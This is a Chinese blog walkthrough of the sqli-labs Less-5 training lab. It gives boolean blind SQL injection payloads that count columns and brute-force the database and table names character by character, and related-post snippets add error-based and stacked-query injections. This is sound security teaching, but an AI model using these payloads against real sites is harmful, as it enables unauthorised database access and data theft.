首页 > 其他分享 >less5

less5

时间:2024-12-19 20:42:15浏览次数:8  
标签:database 23 order less5 ascii id select

1.在URL处输入

?id=1
?id=1'
?id=1"
?id=1/1

发现回显只有you are in......和报错
报错:

判断回显是布尔类型
使用order by发现回显有三栏

?id=1' order by 4%23
?id=1' order by 1%23
?id=1' order by 3%23

判断数据库长度:8位

?id=1' and length((select database()))>=9%23
?id=1' and length((select database()))>=8%23


爆破数据库名:
?id=1' and if((ascii(substr((select database()),1,1))>=1),1,0)%23

标记的区域就是爆破数字,爆破范围是0~255

?id=1' and if((ascii(substr((select database()),1,1))>=115),1,0)%23
#第一位的ascii码是115 也就是s


后续依次爆破得到数据库:security

爆破表名:

http://sqli-labs:89/less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>=101%23

后续操作类似

标签:database,23,order,less5,ascii,id,select
From: https://www.cnblogs.com/halfbrackets/p/18617895

相关文章

  • less5
    一样的,还是先看是什么闭合类型 这个是单引号闭合的然后再判断字长的时候发现这个并没有回显,所以我们就无法使用联合注入了 但是我们在判断他是什么闭合类型的时候还是会报错,所以我们可以使用报错注入 这个主要是使用updatexml函数简单讲一下这个函数,这个函数有三个参数......
  • less50-53
    less50数字型注入,查看源码会发现存在堆叠注入payload?sort=2;insertusers(id,username,password)value('50','less50','1')less51测试11'1'--+正常异常正常可以知道是单引号注入也是堆叠注入,同上less52关闭了报错,可以使用堆叠注入。less53输入?sort=r......
  • sqli-labs less1~less5
    less1#判断出为字符型注入http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1and1=1--+http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.......